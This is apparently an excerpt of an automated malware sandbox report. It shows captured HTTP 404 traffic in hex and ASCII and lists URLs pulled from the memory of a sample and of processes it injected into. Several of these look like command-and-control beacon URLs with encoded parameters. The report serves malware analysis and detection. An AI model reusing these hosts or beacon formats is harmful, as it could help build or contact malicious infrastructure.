0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 29 Nov 2024 08:18:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 29 Nov 2024 08:18:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.000000000495C000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.000000000424C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYED
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Cortisalincontrol.net
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: specifications.exe, 00000000.00000002.1744315921.0000000008770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlm
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.00000000039A8000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003298000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4147180609.0000000005081000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4147180609.0000000005081000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org/lqxd/
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Ball_Bearings.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg6YX
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Control.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg6YXzb8Zql
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/High_Fiber_Foods.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Nutritious_Snacks_Recipes.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1Rabko
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/Salt_Free_Diet.cfm?fp=0RLhBi627cnyXpqt50cEzereqKJw1RabkozzSbMh7eg6Y
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/__media__/design/underconstructionnotice.php?d=cortisalincontrol.ne
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/__media__/js/trademark.php?d=cortisalincontrol.net&type=ns
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/display.cfm
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004314000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003C04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000003684000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2330189855.0000000035AC4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                      Source: neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
